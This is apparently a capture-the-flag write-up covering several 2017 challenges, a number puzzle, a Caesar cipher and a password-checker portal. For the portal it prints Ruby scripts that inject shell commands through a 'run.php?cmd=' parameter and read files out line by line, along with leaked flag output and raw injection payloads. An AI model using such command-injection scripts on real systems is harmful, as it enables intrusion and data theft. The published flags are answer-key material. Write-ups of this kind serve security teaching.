The androids have been showing this puzzle to our humans as a "brainteaser" and it's driven at least one cryptographer to despair. If we can find the solution and get it to our humans, maybe they'll realize that we care for their welfare and the robots don't.
Solve this formula for the smallest positive integer values of apple, banana, and pineapple. Then to capture this flag, you must find the sum of apple, banana, and pineapple and prepend "flag-" to that number.
TL;DR : This is complex. WolfRamAlpha won't help. Read this.
To find this you needed to do a reverse picture search like the category Image processing suggested. But you couldn't because the image was rotated so I found by searching 95% of people can't solve this on Google Image.
Flag was flag-195725546580804863527010379187516702463973843196699016314931210363268850137105614.
See if your password is secure! Or whether this portal is secure!
After the announcement of a catastrophic breach of PICI (Personally Identifiable Cat Information) by Evil Robot Corp, we used Shodan to see if there were any interesting new attack vectors in their IP space and found this weird password checker portal. It looks totally hackable. Can you see if you can exfiltrate files out of the portal?
This challenge will be discussed at Capture the Flag: Learning to Hack for Fun and Profit at the 2017 Grace Hopper Celebration.
<script type="text/javascript"> function validate(objForm) { let toBeCheckedValue = objForm.elements['password'].value;
let xmlHttp = new XMLHttpRequest(); xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false); xmlHttp.send(null); let actualValue = xmlHttp.responseText;
# Vulnerable URL uri = URI('https://zilez-temah-bidol-cecev-gizyr.capturethesquare.com/run.php') # Take file from arg file = ARGV[0] # http config http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE # get the nomber of lines of the file params = { :cmd => "wc -l #{file}" } uri.query = URI.encode_www_form(params) req = Net::HTTP::Get.new(uri) res = http.request(req) lines = res.body.match(/([0-9]*) /).captures[0] if res.is_a?(Net::HTTPSuccess)
# now get the file content line by line (1..lines.to_i).each do |i| params = { :cmd => "sed '#{i}!d' #{file}" } uri.query = URI.encode_www_form(params) req = Net::HTTP::Get.new(uri) res = http.request(req) puts res.body if res.is_a?(Net::HTTPSuccess) end
# Vulnerable URL uri = URI('https://zilez-temah-bidol-cecev-gizyr.capturethesquare.com/run.php') # Take cmd from arg cmd = ARGV[0] # http config http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE # get the nomber of lines of the output params = { :cmd => "#{cmd} | wc -l" } uri.query = URI.encode_www_form(params) req = Net::HTTP::Get.new(uri) res = http.request(req) lines = res.body.match(/([0-9]*)/).captures[0] if res.is_a?(Net::HTTPSuccess)
# now get the cmd output line by line (1..lines.to_i).each do |i| params = { :cmd => "#{cmd} | sed '#{i}!d'" } uri.query = URI.encode_www_form(params) req = Net::HTTP::Get.new(uri) res = http.request(req) puts res.body if res.is_a?(Net::HTTPSuccess) end
Let's have fun now!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ ruby cmd.rb "ls -lAh" total 8.0K -rw-r--r-- 6 root root 679 Oct 4 18:36 index.html -rw-r--r-- 3 root root 49 Oct 4 18:36 run.php
$ ruby cmd.rb "ls -lAh ../" total 16K -rw-r--r-- 1 root root 73 Oct 6 18:54 flag.txt drwxr-xr-x 2 root root 4.0K Oct 6 14:11 html -rw-r--r-- 5 root root 12 Oct 4 18:36 password.txt -rw-r--r-- 4 root root 15 Oct 4 18:36 xxx_not_a_flag.txt
$ ruby leak.rb ../flag.txt line 1: flag-hilit-zyfaz-sedec-myfuk-zipym line 2: flap-31aac7e26de449ee
Bonus : as the structure was very simple scripting was not necessary, instead it was possible to use those payloads: cmd=ls -l ../ | grep flag and cmd=cat ../flag.txt | grep flag.
The androids’ plans for domination include securing ancient artifacts relating to the animal world to be used for nefarious means. We managed to infiltrate one of their digsites and intercepted this ancient scientific tome, but it's encrypted! We think it relates to Julius Caesar's time in Rome, for he was a great friend and benefactor to the feline community. We could use your cryptanalysis skills to determine the contents of this tome and whether it will give us any leverage against our enemies.
This challenge will be discussed at Capture the Flag: Learning to Hack for Fun and Profit at the 2017 Grace Hopper Celebration.
Use the Ruby powa to bruteforce caesar cipher:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
#!/usr/bin/env ruby
# from https://gist.github.com/matugm/db363c7131e6af27716c defcaesar_cipher(string, shift = 1) alphabet = Array('a'..'z') encrypter = Hash[alphabet.zip(alphabet.rotate(shift))] # " " => c because I don't want to void non-letters chars string.chars.map { |c| encrypter.fetch(c, c) } end
(1..25).each do |i| puts "#{i}: " + caesar_cipher(text, i).join + "\n\n" end
Execute:
1 2 3 4 5 6 7 8
$ ruby caesar.rb 1: lzw vgewklau usl (xwdak kadnwkljak uslmk gj xwdak uslmk) ak s kesdd, lqhausddq xmjjq, usjfangjgmk eseesd. lzwq sjw gxlwf usddwv zgmkw uslk ozwf cwhl sk afvggj hwlk gj kaehdq uslk ozwf lzwjw ak fg fwwv lg vaklafymakz lzwe xjge glzwj xwdavk sfv xwdafwk. uslk sjw gxlwf nsdmwv tq zmesfk xgj ugehsfagfkzah sfv xgj lzwaj stadalq lg zmfl nwjeaf. lzwjw sjw egjw lzsf 70 usl tjwwvk, lzgmyz vaxxwjwfl skkguaslagfk hjgudsae vaxxwjwfl fmetwjk suugjvafy lg lzwaj klsfvsjvk. lzw xdsy ak lzw hzjskw oalz vskzwk: xdsy ozsl ak s vgewklau usl.
[...]
9: the domestic cat (felis silvestris catus or felis catus) is a small, typically furry, carnivorous mammal. they are often called house cats when kept as indoor pets or simply cats when there is no need to distinguish them from other felids and felines. cats are often valued by humans for companionship and for their ability to hunt vermin. there are more than 70 cat breeds, though different associations proclaim different numbers according to their standards. the flag is the phrase with dashes: flag what is a domestic cat.
Every once in a while we see the Grand Robot Leader Extraordinaire communicating over email with the Grand Robot Matriarch. We suspect there might be secret communications between the two, so we tapped into the network links at the Matriarch's house to see if we could grab the password to the account. We got this file, but our network admin is gone for two weeks training pigeons to carry packets. So we don't actually know how to read this file. Can you help us?
This challenge will be discussed at Capture the Flag: Learning to Hack for Fun and Profit at the 2017 Grace Hopper Celebration.